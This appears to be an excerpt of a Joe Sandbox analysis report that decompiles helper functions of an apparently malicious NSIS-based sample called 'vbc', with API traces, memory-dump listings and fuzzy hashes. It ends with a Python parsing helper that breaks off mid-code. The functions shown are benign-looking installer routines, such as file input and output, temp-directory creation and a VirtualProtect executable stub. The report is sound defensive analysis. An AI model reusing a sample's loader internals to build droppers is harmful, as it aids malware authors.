                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                    • String ID:
                    • API String ID: 1892508949-0
                    • Opcode ID: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
                    • Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
                    • Opcode Fuzzy Hash: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
                    • Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00401389(signed int _a4, struct HWND__* _a10) {
                    				intOrPtr* _t6;
                    				void* _t8;
                    				void* _t10;
                    				signed int _t11;
                    				void* _t12;
                    				signed int _t16;
                    				signed int _t17;
                    
                    				_t17 = _a4;
                    				while(_t17 >= 0) {
                    					_t6 = _t17 * 0x1c +  *0x7a8a90;
                    					if( *_t6 == 1) {
                    						break;
                    					}
                    					_push(_t6); // executed
                    					_t8 = E00401434(); // executed
                    					if(_t8 == 0x7fffffff) {
                    						return 0x7fffffff;
                    					}
                    					_t10 = E0040136D(_t8);
                    					if(_t10 != 0) {
                    						_t11 = _t10 - 1;
                    						_t16 = _t17;
                    						_t17 = _t11;
                    						_t12 = _t11 - _t16;
                    					} else {
                    						_t12 = _t10 + 1;
                    						_t17 = _t17 + 1;
                    					}
                    					if(_a10 != 0) {
                    						 *0x7a7a4c =  *0x7a7a4c + _t12;
                    						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
                    					}
                    				}
                    				return 0;
                    			}

                    0x0040138a
                    0x004013fa
                    0x0040139b
                    0x004013a0
                    0x00000000
                    0x00000000
                    0x004013a2
                    0x004013a3
                    0x004013ad
                    0x00000000
                    0x00401404
                    0x004013b0
                    0x004013b7
                    0x004013bd
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013b9
                    0x004013b9
                    0x004013ba
                    0x004013ba
                    0x004013c9
                    0x004013cb
                    0x004013f4
                    0x004013f4
                    0x004013c9
                    0x00000000

                    APIs
                    • MulDiv.KERNEL32 ref: 004013E4
                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                    • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                    • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                    • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E0040564F(signed int __eax) {
                    				struct HWND__* _v0;
                    				intOrPtr _t10;
                    				intOrPtr _t11;
                    				intOrPtr* _t12;
                    
                    				_t11 =  *0x7a8a88;
                    				_t10 =  *0x7a8a8c;
                    				__imp__OleInitialize(0); // executed
                    				 *0x7a8b20 =  *0x7a8b20 | __eax;
                    				E004044C2(0);
                    				if(_t10 != 0) {
                    					_t12 = _t11 + 0xc;
                    					while(1) {
                    						_t10 = _t10 - 1;
                    						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                    							break;
                    						}
                    						_t12 = _t12 + 0x818;
                    						if(_t10 != 0) {
                    							continue;
                    						} else {
                    						}
                    						goto L7;
                    					}
                    					 *0x7a8aec =  *0x7a8aec + 1;
                    				}
                    				L7:
                    				E004044C2(0x404);
                    				__imp__OleUninitialize();
                    				return  *0x7a8aec;
                    			}

                    0x00405650
                    0x00405657
                    0x0040565f
                    0x00405665
                    0x0040566d
                    0x00405674
                    0x00405676
                    0x00405679
                    0x00405679
                    0x0040567e
                    0x00000000
                    0x00000000
                    0x0040568f
                    0x00405697
                    0x00000000
                    0x00000000
                    0x00405699
                    0x00000000
                    0x00405697
                    0x0040569b
                    0x0040569b
                    0x004056a1
                    0x004056a6
                    0x004056ab
                    0x004056b8

                    APIs
                    • OleInitialize.OLE32(00000000), ref: 0040565F
                      • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                    • OleUninitialize.OLE32 ref: 004056AB
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: InitializeMessageSendUninitialize
                    • String ID:
                    • API String ID: 2896919175-0
                    • Opcode ID: 87b30d2b785286fdc66c83050ab24e3334c98b30792f2f1f5f727908fd7dcf92
                    • Instruction ID: aa0e5c346db56849faed3f3240e829529484723dbc79c21abe6f002b31812de8
                    • Opcode Fuzzy Hash: 87b30d2b785286fdc66c83050ab24e3334c98b30792f2f1f5f727908fd7dcf92
                    • Instruction Fuzzy Hash: 87F096735005008BD3415754AD05B577364EBC5315F49C93BEF8CA22A0DB7A48118B5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                    • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Window$EnableShow
                    • String ID:
                    • API String ID: 1136574915-0
                    • Opcode ID: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                    • Instruction ID: 6c41119d880c6e907524726e204bf21ac727531236896e2a35a455d3971ed6d0
                    • Opcode Fuzzy Hash: 393b5c21bb7cc3de8bedbfe4bad105ee39a9eabd1884b7fb5bcfa8057cf0f7ce
                    • Instruction Fuzzy Hash: 62E01272908211CFE705EBA4EE495AE77B4EB40315710497FE501F11D1DBB94D00865D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004068E7(signed int _a4) {
                    				struct HINSTANCE__* _t5;
                    				signed int _t10;
                    
                    				_t10 = _a4 << 3;
                    				_t8 =  *(_t10 + 0x40a3e0);
                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                    				if(_t5 != 0) {
                    					L2:
                    					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                    				}
                    				_t5 = E00406877(_t8); // executed
                    				if(_t5 == 0) {
                    					return 0;
                    				}
                    				goto L2;
                    			}

                    0x004068ef
                    0x004068f2
                    0x004068f9
                    0x00406901
                    0x0040690d
                    0x00000000
                    0x00406914
                    0x00406904
                    0x0040690b
                    0x00000000
                    0x0040691c
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                      • Part of subcall function 00406877: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                      • Part of subcall function 00406877: wsprintfW.USER32 ref: 004068C9
                      • Part of subcall function 00406877: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                    • String ID:
                    • API String ID: 2547128583-0
                    • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                    • Instruction ID: 6423a29397ed7bff7b22ace80297d9bc35d616ea5f013efbaa2f78a15a639a79
                    • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                    • Instruction Fuzzy Hash: CEE08673504210AAE21196716E44C7773A89F89740316443FF946F2080D738DC359AAD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E0040600A(WCHAR* _a4, long _a8, long _a12) {
                    				signed int _t5;
                    				void* _t6;
                    
                    				_t5 = GetFileAttributesW(_a4); // executed
                    				asm("sbb ecx, ecx");
                    				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                    				return _t6;
                    			}

                    0x0040600e
                    0x0040601b
                    0x00406030
                    0x00406036

                    APIs
                    • GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                    • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                    • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                    • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405FE5(WCHAR* _a4) {
                    				signed char _t3;
                    				signed char _t7;
                    
                    				_t3 = GetFileAttributesW(_a4); // executed
                    				_t7 = _t3;
                    				if(_t7 != 0xffffffff) {
                    					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                    				}
                    				return _t7;
                    			}

                    0x00405fea
                    0x00405ff0
                    0x00405ff5
                    0x00405ffe
                    0x00405ffe
                    0x00406007

                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,00405BEA,?,?,00000000,00405DC0,?,?,?,?), ref: 00405FEA
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FFE
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction ID: e4d3e829c0d5e7da9196b8d45c2199d6a51b20c6ab53065100e3d1aec4738abc
                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction Fuzzy Hash: 4CD01272504130BFC2102728EF0C89BBF95EF64375B024B35FAA5A22F0CB304C638A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405AC8(WCHAR* _a4) { // CreateDirectoryW wrapper: returns 0 on success, otherwise the Win32 error code; the API trace shows it called with the %TEMP% path
                    				int _t2;
                    
                    				_t2 = CreateDirectoryW(_a4, 0); // executed; NULL security attributes
                    				if(_t2 == 0) {
                    					return GetLastError(); // e.g. ERROR_ALREADY_EXISTS when the directory is already present
                    				}
                    				return 0;
                    			}




                    Instruction addresses: 0x00405ace, 0x00405ad6, 0x00000000, 0x00405adc, 0x00000000

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                    • GetLastError.KERNEL32 ref: 00405ADC
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                    • Instruction ID: 96bb703f3db892353912e36940962cdd7e9d34b0f70b6f3c067145efd4a10b7e
                    • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                    • Instruction Fuzzy Hash: 95C04C30344601AEDA105B219E48B1B7AD4DB50741F26853D6146F41A0EA788455DD3D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040608D(void* _a4, void* _a8, long _a12) { // exact-length read: succeeds only if ReadFile returns exactly the requested number of bytes
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12; // requested length
                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed; the _a12 argument slot is reused as lpNumberOfBytesRead
                    				if(_t7 == 0 || _t11 != _a12) { // API failure or a short read (e.g. end of file) are both treated as failure
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}





                    Instruction addresses: 0x00406091, 0x004060a1, 0x004060a9, 0x00000000, 0x004060b0, 0x00000000, 0x004060b2

                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060A1
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction ID: 9ce5220da9ed3c49ab8c05536da5923326b58a2142fda2ae973167115508ceb5
                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction Fuzzy Hash: 2DE08632140259ABCF119E518C00AEB376CFB05350F018472F911E2240D630E82187A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004060BC(void* _a4, void* _a8, long _a12) { // exact-length write, mirror of the ReadFile helper: succeeds only if every requested byte was written
                    				int _t7;
                    				long _t11;
                    
                    				_t11 = _a12; // requested length
                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed; the _a12 argument slot is reused as lpNumberOfBytesWritten
                    				if(_t7 == 0 || _t11 != _a12) { // API failure or a short write are both treated as failure
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}





                    Instruction addresses: 0x004060c0, 0x004060d0, 0x004060d8, 0x00000000, 0x004060df, 0x00000000, 0x004060e1

                    APIs
                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060D0
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: the same 13 regions of the module at 00400000 as listed in the first Memory Dump Source block above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction ID: ff7f98053b8daf8dc00d9e724bd7773b369301681fd057c4f0a19a08aea0fefc
                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction Fuzzy Hash: AEE0EC3225426AABDF10AF659C00AEB7BACFB15360F018437FA56E3190D631E83197A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			_entry_(intOrPtr _a4, intOrPtr _a8) { // DllMain of the module loaded at 734F0000: _a4 = hinstDLL, _a8 = fdwReason
                    
                    				 *0x734f5048 = _a4; // keep the module handle in a global
                    				if(_a8 == 1) { // DLL_PROCESS_ATTACH
                    					VirtualProtect(0x734f505c, 4, 0x40, 0x734f504c); // executed: 4 bytes of the module's own data become PAGE_EXECUTE_READWRITE; the old protection is written to 0x734f504c
                    					 *0x734f505c = 0xc2; // x86 opcode RET imm16: a tiny return stub is built in writable and executable memory at load time. This matches the load-time initialisation of the NSIS System plugin, which patches its call-return stub the same way
                    					 *0x734f504c = 0; // the old-protection slot doubles as an ordinary global and is cleared
                    					 *0x734f5054 = 0;
                    					 *0x734f5068 = 0;
                    					 *0x734f5058 = 0;
                    					 *0x734f5050 = 0;
                    					 *0x734f5060 = 0;
                    					 *0x734f505e = 0; // clears the bytes right after the RET opcode (its imm16 operand)
                    				}
                    				return 1; // TRUE: let the load continue
                    			}



                    Instruction addresses: 0x734f2a88, 0x734f2a8d, 0x734f2a9d, 0x734f2aa5, 0x734f2aac, 0x734f2ab1, 0x734f2ab6, 0x734f2abb, 0x734f2ac0, 0x734f2ac5, 0x734f2aca, 0x734f2aca, 0x734f2ad2

                    APIs
                    • VirtualProtect.KERNELBASE(734F505C,00000004,00000040,734F504C), ref: 734F2A9D
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: cba72d9d65bb3c1eaea94b65d0afbd7cda36b9ef51b3022fa2ce7a7cbfd48be2
                    • Instruction ID: dfd96dcbab987fca718179b10e64d90dd0ba2f3a5777b4db7b1f12f4caccacc4
                    • Opcode Fuzzy Hash: cba72d9d65bb3c1eaea94b65d0afbd7cda36b9ef51b3022fa2ce7a7cbfd48be2
                    • Instruction Fuzzy Hash: D1F092F2940282EFC358EF2A8444B0A3FE0F74A304F2D45AAE19CF6242E3344264CB95
                    Uniqueness

                    Uniqueness Score: -1.00%
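The Memory Dump Source file names above and the raw 0x40 handed to VirtualProtect in the DllMain both encode Win32 memory-protection constants, and the API trace lines share one fixed shape. The following Python helper is an added example and is not part of the Joe Sandbox report or of the sample's code: it splits a dump file name into its fields, names the protection and region type, and turns the API trace lines of one function record into structured calls. The positions of the process id, base address, protection and region type are read off the values on this page (0x401000 carries 0x20 = PAGE_EXECUTE_READ, 0x40A000 carries 0x04 = PAGE_READWRITE, every region carries 0x01000000 = MEM_IMAGE); the meaning of the second, sixth and last fields is an assumption, and the sample record is constructed from lines of the E00405AC8 entry.

```python
import re
from dataclasses import dataclass

# Win32 memory-protection constants (winnt.h). The low byte is the base
# protection; the higher bits are modifiers that can be OR-ed in.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# MEMORY_BASIC_INFORMATION.Type values (winnt.h).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def decode_protect(value: int) -> str:
    """Render a PAGE_* value, e.g. the 0x40 passed to VirtualProtect above."""
    base = PAGE_PROTECT.get(value & 0xFF, f"0x{value & 0xFF:02x}")
    mods = [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return "|".join([base] + mods)


@dataclass
class DumpRegion:
    pid: int
    base: int
    protect: str
    region_type: str
    executable: bool
    raw: str


# Dotted fields of a Joe Sandbox dump name. Process id, base address, protection
# and region type follow from the values on this page; 'round', 'flag' and
# 'module' are kept but their meaning is an assumption, not something the
# report states.
SDMP_RE = re.compile(
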